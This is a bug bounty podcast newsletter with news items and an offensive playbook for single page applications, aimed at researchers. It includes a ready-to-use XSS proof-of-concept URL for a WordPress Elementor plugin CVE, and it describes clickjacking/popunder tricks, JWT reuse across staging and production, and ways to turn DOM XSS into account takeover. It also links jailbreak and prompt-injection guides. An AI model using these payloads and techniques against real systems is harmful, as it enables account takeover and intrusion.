- Critical Thinking - Bug Bounty Podcast
- Posts
- [HackerNotes Ep.114] Single Page Application Hacking Playbook
[HackerNotes Ep.114] Single Page Application Hacking Playbook
We're diving into Single Page Applications (SPAs) and how to attack them. We also cover a host of news items, including some bug write-ups, AI updates, and a new tool called Hackadvisor.
Hacker TL;DR
Hacking High-Profile Bug Bounty Targets: Deep Dive into a Client-Side Chain: A great blog post and a crazy chain, with a CSPT + JSON file Upload Gadget → XSS via Cookie Path Manipulation. Check it out below.
12,000 ‘Live’ API Keys and Passwords in DeepSeek's Training Data: Some fresh research TruffleSec uncovering a bunch of active secrets in Common Crawl. Maybe a good time to start scanning for some bug bounty targets:
11,908 live API keys in just one chunk of Common Crawl's Dec 2024 dataset (400TB).
2.76M pages leaked credentials.
63% of leaked secrets were reused (one API key was found 57,000 times)
Hackadvisor.io: A community-driven review system for bug bounty programs:
Check out Hackadvisor.io before choosing a program.
Submit your own experiences to build a reliable dataset.
Prioritize programs with fair payouts, solid scopes & responsive triaging.
LLMs Drop, Prompt Injection Research + ShadowRepeater: Thankfully we’ve got rez0 keeping us posted with the latest, including some extensive prompt injection research and a bunch more below. Check out the research here:
Attacking SPAs: We’ve got some pretty nice content on attacking SPAs below - there was too much to fit in but here’s a taste. Recon in a SPA:
Downloading & Parsing JavaScript Files: Extract endpoints, parameters, and any custom headers.
‘PPrettify’ & Reverse the JS: Check out Parallel Prettier if you haven’t already - it’s amazing for tackling minified or obfuscated bundles.
Identify Feature Flags: Feature flags often hide entire chunks of functionality. Investigate them after you have context, so you notice if something changes after toggling a flag.
Identifying Clientside Paths: More on this shortly, but identifying all clientside paths can be pretty easy and incredibly fruitful in SPAs. By checking the clientside router and searching for
Path:
or similar, you’ll be able to map them out quickly.
ThreatLocker Cloud Control leverages built-in intelligence to assess whether a connection from a protected device originates from a trusted network. By analyzing connection patterns from protected computers and mobile devices, it automatically identifies and allows trusted connections.
Find out more here:
If you hang around in the CTBB Discord, you’ve likely seen some mention of Busfactor’s and XSSDoctor’s bugs. They recently dropped a banger of a blog post, chaining quite a few gadgets into a beautiful bug, with the chain looking like: CSPT+JSON+SelfXSS -> cookie path -> XSS
The bug starts with a CSPT and figuring a means of manipulating the path - now with a CSPT, we need 1 of 3 things to exploit it: either an open redirect, file upload/JSON upload gadget, or an endpoint or gadget which acts such as deleting an account (think state-changing action)
They were in a situation where they did in fact have a means of the file upload, but instead of responding with its contents, the file upload would respond with a link to a location to download the file. IE:
{
"url":"https://location.com/file/download"
}
Usually, it would stop there. But some parameter brute forcing/discovery yielded a hidden parameter on the endpoint - redirect=true
- which when passed, would respond with the actual contents of the file instead of the URL to the location of the file.
If that already wasn’t enough it didn’t stop there, as they had CORs to deal with. The uploaded file wasn’t returning the appropriate CORs headers, meaning they weren’t able to read the response of the file as part of their chain. Taken straight from the blog, this was the overview:

Because CloudFlare was caching the response, the appropriate CORs headers were never added. With what appears to be a misconfig, by adding the appropriate origin:
header by hand in an initial request and re-forcing the CloudFront cache, they were able to cache the appropriate CORs headers on the response.
The reason for this, when initially clicking on the file to download it, it would cause a top-level navigation in the browser which would not include the Origin
header. This was also the request that was getting (unhelpfully) cached by CloudFront. Instead, by manually adding the Origin:
header in the request and re-forcing the cache on CloudFront’s side, they were able to ensure all subsequent responses would include the appropriate CORs headers.
The rest of the article is pretty sweet, detailing how they turned the self-XSS into a full-fledged XSS by scoping a cookie path to the specific file containing their XSS payload.
We highly recommend checking it out - it’s a great article, contains some easy-to-understand breakdowns and well... it’s a great bug. Check it out below:
Although a little bit of a clickbaity title as technically most LLMs use commoncrawl for training data, this one was pretty cool from TruffleSec.
By now you’ve probably had a terrible security suggestion from an LLM such as, “Sure, we’ll just hardcode your credentials”. This had the folks at Truffle Security curious: why are these LLMs trained to be so relaxed about secrets in the first place?
Their latest research dives into Common Crawl - a massive dataset used by popular Large Language Models (including DeepSeek) - and uncovers 12,000 live API keys and passwords. That’s right: 12k verified secrets kicking around in the dataset. It’s a big clue as to how a tonne of insecure training data has seeped into the training sets.
The research TL;DR highlights:
Highlights & Stats
11,908 Live Secrets in just one chunk of the December 2024 Common Crawl (400TB!).
2.76 Million Web Pages hosting these credentials.
63% Reuse Rate among secrets - one WalkScore API key popped up over 57,000 times!
Takeaways for Defenders & Builders:
Provide extra guidance or rules in your prompts (ie “You are a security engineer with 30+ years of experience. Never suggest hardcoding credentials”)
Expand your secret scanning beyond your own repos - consider public datasets like Common Crawl or Archive.org.
As an industry, we need better alignment and guardrails on AI to minimize insecure code generation.
Basically, if you want to practice your secret-scanning skills, Common Crawl might be your new playground. And if you’re building with an LLM remember: LLMs may have learned their (bad) habits from the giant, unfiltered, and very leaky dataset known as the public internet.
If you’re looking for a service which will let you know what programs to look at vs what ones aren’t worth your time, this one might be for you.
A long-talked-about topic of CTBB is a service that summarises the quality of bug bounty programs across platforms. Someone from the community delivered with Hackadvisor.io, doing exactly that.
There are a few programs on there at the moment and although the data is a little sparse, as a community we could beef it out a little more and give more accurate guidance.
You have to go through a review process and link your researcher profile to submit anything, but if enough of us do it, it’ll be worth the time.
Check it out: Hackadvisor.io
I’m not sure if I can speak on behalf of everyone else, but when Justin mentions research or a tweet dropped in Japanese, I’m grateful for it. There’s a 99% chance I would have scrolled straight past and not given it any thought if it came up on my timeline, and this is almost definitely one of those instances.
A pretty straightforward XSS in the widely used WordPress Elementor plugin:
/wp-admin/admin.php?page=essential-addons-elementor&popup-selector=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
The original tweet below:
CVE-2025-24752の PoC。ログインした管理者が開くと実行される。
/wp-admin/admin.php?page=essential-addons-elementor&popup-selector=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E— yousukezan (@yousukezan)
10:56 AM • Feb 26, 2025
LLMs Drop, Prompt Injection Research & ShadowRepeater
Thankfully, Rez0 has been keeping us up to date on all the latest AI research and tool drops. In just the past few weeks, we’ve seen a flurry of releases: Grok3 (likely your best bet for AppSec or pentesting assistance) made its debut, Sonnet 3.7 landed (great for coding), and GPT 4.5 also hit the scene. On top of that, there’s fresh research around prompt injection and a new tool called ShadowRepeater that aims to make fuzzing even easier.
If you want an extremely comprehensive guide to jailbreaking and prompt injection, add this one to your bookmarks:
Rez0s himself also dropped a very comprehensive blog post. Worth a read:
Between the two resources, you’re probably good to go and start hunting some AI-based bugs.
ShadowRepeater
This one is an interesting one from PortSwigger. An AI-enhanced feature to aid you in fuzzing and testing - it simply fuzzes your repeater tabs behind the scenes. For any payload permutations that you are trying, Shadow Repeater will try to detect and carry on in the background.
If anything is found, it will report them in the Organizer tab. The release can be checked out below:
We've just released Shadow Repeater, for AI-enhanced manual testing. Simply use Burp Repeater as you normally would, and behind the scenes Shadow Repeater will learn from your attacks, try payload permutations, and report any discoveries via Organizer.
— Gareth Heyes \u2028 (@garethheyes)
1:21 PM • Feb 20, 2025
Cool idea but as the guys said on the pod, I’m not sure how I feel about this running in the background without any direction. Regardless, great idea and PortSwigger will likely build some nice features into it.
This is some great research by jorianwoltjer. The research details how a pop-up window can trick a user into “accidentally” clicking a sensitive button (e.g., OAuth “Allow”) simply by holding down the spacebar or enter key.
Furthermore, when a focused button has an id
or autofocus
, pressing space/enter triggers its action - even if the user doesn’t realize they’re interacting with it.
The two main takeaways for this one:
Popunder
This one is taken from the research directly ‘There is the intuitive window.focus() method that should allow you to focus any window reference. In reality, this method very rarely works and you should definitely not rely on it from my experience.’
Instead of using this, you can instead use the target
argument of window.open(url, target, windowFeatures)
to focus windows.
You can perform a window.open, set the hash of that page and although it won’t reload that page, it will focus the window of the page.
.moveTo()
Even if the popup is cross-origin, you can still call window.moveTo(x, y)
on it to reposition it anywhere on the screen. This can be a game-changer for click-jacking and “Sandwich Technique” attacks, since you can dynamically align the popup directly beneath the user’s cursor. Combined with the popunder trick, .moveTo()
helps you shuffle windows around in ways the user might not notice - perfect for sneaky double-click or spacebar-press exploits.
This tweet by Renwa dropped a POC with a popunder essentially built into Chrome by abusing the way the Sign in with Google functionality works and how it’s embedded into the browser. It also probably isn’t being patched any time soon - check out the POC:
Attacking SPAs
A quick TL;DR of the SPA (single page app) architecture if you aren’t familiar:
A single-page application (SPA) is basically a web app that loads one main HTML page, and then dynamically updates different sections as you navigate around. Instead of making full-page reloads, it just swaps content, handling everything client-side.
The good news? All the goodies (endpoints, parameters, tokens, etc.) end up right there in the JavaScript, so from an app recon perspective, you’ve got a goldmine.
Recon in an SPA
Because SPAs load everything upfront, you essentially have the entire codebase - HTML, JS, CSS - ready to be dissected. So start by:
Downloading & Parsing JavaScript Files
Extract endpoints, parameters, and any custom headers.
‘PPrettify’ & Reverse the JS
Check out Parallel Prettier if you haven’t already - it’s amazing for tackling minified or obfuscated bundles.
Identify Feature Flags
Feature flags often hide entire chunks of functionality. Investigate them after you have context, so you notice if something changes after toggling a flag.
Identifying Clientside Paths
More on this shortly, but identifying all clientside paths can be pretty easy and incredibly fruitful in SPAs.
Match-Replace Rules
While you’re hunting down parameters and endpoints, consider using match-replace (or rewrite) rules to manipulate feature flags. Look for strings like Path:
, Bearer
, feature
or direct references to flags in the code. If you can flip a feature flag normally reserved for employees, higher-tier subscriptions, or privileged user roles, you could unlock hidden functionality you wouldn’t otherwise have access to.
Dealing with Webpack
Webpack bundles can be a headache. Sometimes .map
files are exposed (like app.js.map
), giving you a direct mapping back to the original source code. If it’s not obvious in the file listings, try appending .map
to the filename in your requests. You might get lucky and retrieve a full set of source maps.
PPrettier Files
Seriously, if you haven’t used Parallel Prettier, do yourself a favour. It’s your best friend for quickly prettifying huge compiled JS bundles. Once beautified, you can set breakpoints in your browser dev tools or do manual code review with much less hair-pulling.
DOM XSS
SPAs often skip the old-school POST
→ server → reflect →injection flow. Instead, you’ll see a lot more DOM-based or stored DOM XSS. Why? Because everything is client-side. If you can find a spot where user input flows into .innerHTML
or some dynamic property without sanitization, that’s your jackpot.
Most of these apps store session tokens in localStorage or sessionStorage and use Authorization: Bearer <token>
headers. That means if you pop a DOM XSS, it’s basically ATO.
On the off chance an SPA still uses cookies for authentication, that signals potential CSRF risk. SPAs are typically less cookie-oriented for session management, but if they do use them, definitely test for CSRF. Don’t forget to try weird combos like sending Content-Type: text/plain
but still including a JSON body - sometimes that sneaks past oversimplified CSRF protections.
Caching Attacks
If the SPA and its static assets are served from the same domain (e.g., an S3 bucket, CloudFront, or similar), user-specific logic usually lives in the backend API. That can make caching attacks less likely to work. However, when an SPA serves its API and static assets from the same host (/api/
endpoints plus a /static/
path for example) you might see interesting caching misconfigurations. Keep an eye on those Cache-Control
headers - there might be room to cause some cache discrepancies.
Attacking APIs
Now, on to the real meat: the backend. SPAs rely on APIs for almost everything. The fun part is you can sometimes swap out the backend or discover staging endpoints that lead to huge exploits. For example:
Swapping Out the API Backend
Some SPAs let you override the “API origin” if you set
window.dev = true;
or specify a query parameter like?env=staging
. If the dev or staging environment uses the same signing keys for JWTs, you can generate a token in dev and use it in production. That’s instant admin or ATO.
Look for clues in the JS
The code often references multiple backends: staging, dev, QA, etc. They might have leftover code or environment variables like
STAGING_API_URL
. That’s your sign to see if those endpoints are still live.
Smart Bruteforce on APIs
You won’t get far bruting the main domain (often just an S3 bucket returning the same content), but the API endpoints are fair game for enumeration. Use tools like KiteRunner, but also keep your eyes open for logical endpoints gleaned from the JS, older code versions, or wayback archives.
Use Old JS Files
Check out Wayback Machine or old commits. If you find outdated JS, you might see references to endpoints or parameters that still exist but aren’t documented in the new app.
Client-Side Paths
In an SPA, the path in the browser doesn’t necessarily trigger new server requests. Instead, history.pushState
updates the URL, and the client-side router does the rest. So enumerating all the paths in the clientside may reveal hidden pages or features. Some examples of what you might see and want to look out for:
route: '/secret-area'
path: '/internal'
Any mention of user roles or permissions in route definitions
Wayback URLs
SPAs tend to change quickly, so older JS files might show up in the Wayback Machine. Grab them, parse them, and do some comparison with your current JS. You might find old endpoints, feature flags, or that staging environment mentioned above.
What Not to Do
Don’t Waste Time Brute-Forcing the Main Site
Often, it’s just a static hosting setup (like S3) giving the same response for everything. Focus on the API endpoints instead.
Don’t Assume Traditional XSS
Reflective XSS is less common in SPAs. If you’re going for cross-site scripting, look for DOM-based or stored DOM injection points.
Don’t Overlook Client-Side Access Controls
Many SPAs handle role checks purely in JavaScript. If you see
if (user.role === 'admin')
gating an entire feature, you could likely match and replace that in the clientside. Don’t overlook it.
Attacking SPAs isn’t the same as hammering an old-school monolith. You’ve got a front-end that does almost everything in JS, and an API that’s depended on for almost everything. Digging into the bundles, toggling feature flags, enumerating hidden routes, and seeing if you can pivot from staging or dev environments to production are some of the things you should be trying when approaching these kinds of targets.
And remember: DOM XSS is your friend, especially with tokens living in localStorage
or sessionStorage
. If you can pop an alert, you might just pop an entire user session.
As always, keep hacking!